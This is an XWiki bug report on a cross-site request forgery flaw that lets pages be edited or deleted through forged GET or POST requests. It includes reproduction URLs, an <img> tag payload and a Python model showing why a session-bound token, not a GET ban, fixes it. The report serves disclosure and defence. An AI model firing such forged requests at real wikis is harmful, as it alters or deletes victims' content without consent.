Details
Description
A logged-in user with "Edit" rights can modify pages with a simple GET request, so the edit and delete actions can be triggered cross-site (CSRF): the browser attaches the victim's session cookie to any request an attacker's page causes it to send.
To reproduce (on localhost, while logged in with Edit rights), open the following URLs:
Edit the title of Main.WebHome:
http://localhost:8080/xwiki/bin/preview/Main/WebHome?title=qqqqq&xeditaction=edit&action_save=Save+%26+View
Edit the content of Main.WebHome:
http://localhost:8080/xwiki/bin/preview/Main/WebHome?content=qwert&xeditaction=edit&action_save=Save+%26+View
Put Main.WebHome into recycle bin:
http://localhost:8080/xwiki/bin/delete/Main/WebHome?confirm=1
It is also possible to attach an edit comment to the change, switch the wiki syntax of the page, redirect to another page after the edit, etc., all through request parameters.
The affected user does not have to click such a URL; it is enough to visit any website containing something like:
<img src="http://localhost:8080/xwiki/bin/preview/Main/WebHome?title=p0wned&xeditaction=edit&action_save=Save+%26+View" />
Forbidding such state-changing actions over GET requests would make this issue harder to exploit but would not fix it: the attacker's page can still issue a POST request (an auto-submitting HTML form needs no script at all), and the browser attaches the session cookie to that POST just as it does to the GET. What actually closes the hole is server-side CSRF protection, i.e. a secret tied to the session that every state-changing request must carry and that a cross-site page cannot read, which is the protection the linked issue XWIKI-6773 is about.
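To make the two points above concrete (a GET-only ban is insufficient, a session-bound token is what stops the forged request), here is a small Python model of the preview/save endpoint. This is an added example written for this page, not XWiki's code: the in-memory session and page store, the `save()` function, the URL/verb handling and the token field name `form_token` are all assumptions made for illustration. It replays the `<img>` GET from the report, the forged POST the last paragraph warns about, and a genuine edit, first against the reported behaviour and then with CSRF protection on.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

VICTIM_COOKIE = "JSESSIONID=abc123"  # constructed session cookie of the victim


def new_wiki():
    """Constructed server state: one logged-in session and one page."""
    return {
        "sessions": {VICTIM_COOKIE: {"user": "alice", "csrf_token": secrets.token_hex(16)}},
        "pages": {"Main.WebHome": {"title": "Welcome", "content": "Hello"}},
    }


def request_params(method, url, body):
    """Merge query-string and POST-body parameters, the way a servlet's
    getParameter() does, so ?title=... works on either verb."""
    merged = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    if method == "POST":
        merged.update({k: v[0] for k, v in parse_qs(body).items()})
    return merged


def document_of(url):
    """'/xwiki/bin/preview/Main/WebHome' -> 'Main.WebHome' (assumed URL layout)."""
    space, name = urlsplit(url).path.rstrip("/").split("/")[-2:]
    return f"{space}.{name}"


def save(wiki, method, url, cookie, body="", csrf_protection=False):
    """Model of the preview/save endpoint.  With csrf_protection=False it does
    what the report describes: any request carrying the session cookie plus
    xeditaction=edit and action_save is applied, whatever its verb or origin.
    With csrf_protection=True it refuses GET for state changes and demands the
    per-session secret (field name 'form_token' is an assumption), which a
    cross-site page cannot read because of the same-origin policy."""
    session = wiki["sessions"].get(cookie)
    if session is None:
        return 401, "not logged in"
    p = request_params(method, url, body)
    if p.get("xeditaction") != "edit" or "action_save" not in p:
        return 200, "preview only"
    if csrf_protection:
        if method != "POST":
            return 405, "state change over GET refused"
        # Constant-time compare on bytes so the check neither leaks timing
        # nor raises on non-ASCII input.
        supplied = p.get("form_token", "").encode()
        if not hmac.compare_digest(supplied, session["csrf_token"].encode()):
            return 403, "missing or wrong CSRF token"
    page = wiki["pages"][document_of(url)]
    for field_name in ("title", "content"):
        if field_name in p:
            page[field_name] = p[field_name]
    return 302, "saved"


# The <img src=...> from the report, and the same parameters as a POST body.
IMG_URL = ("http://localhost:8080/xwiki/bin/preview/Main/WebHome"
           "?title=p0wned&xeditaction=edit&action_save=Save+%26+View")
POST_URL = "http://localhost:8080/xwiki/bin/preview/Main/WebHome"
FORGED_BODY = "title=p0wned&xeditaction=edit&action_save=Save+%26+View"


def replay(csrf_protection):
    """Replay the requests the victim's browser can be tricked into sending
    (cookie attached automatically) and report the status codes and titles."""
    wiki = new_wiki()
    out = {}
    # 1. Cross-site GET triggered by the <img> tag.
    out["img_get"] = save(wiki, "GET", IMG_URL, VICTIM_COOKIE,
                          csrf_protection=csrf_protection)[0]
    # 2. Cross-site POST from an auto-submitting form on the attacker's page;
    #    it cannot include the token because the attacker never sees it.
    out["forged_post"] = save(wiki, "POST", POST_URL, VICTIM_COOKIE,
                              FORGED_BODY, csrf_protection)[0]
    out["title_after_attack"] = wiki["pages"]["Main.WebHome"]["title"]
    # 3. A genuine edit submitted from the wiki's own form, which carries the token.
    token = wiki["sessions"][VICTIM_COOKIE]["csrf_token"]
    legit_body = FORGED_BODY.replace("p0wned", "legit") + "&form_token=" + token
    out["legit_post"] = save(wiki, "POST", POST_URL, VICTIM_COOKIE,
                             legit_body, csrf_protection)[0]
    out["title_after_legit"] = wiki["pages"]["Main.WebHome"]["title"]
    return out


if __name__ == "__main__":
    print("as reported:", replay(csrf_protection=False))
    print("with CSRF protection:", replay(csrf_protection=True))
```

Without protection both forged requests are accepted (302) and the title becomes `p0wned`; with protection the GET is refused (405), the forged POST is rejected for lacking the token (403), the page is untouched, and the genuine edit still goes through. Rejecting GET alone would only move the attack from step 1 to step 2.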
Issue Links
- blocks XWIKI-6773 Enable CSRF protection by default (Closed)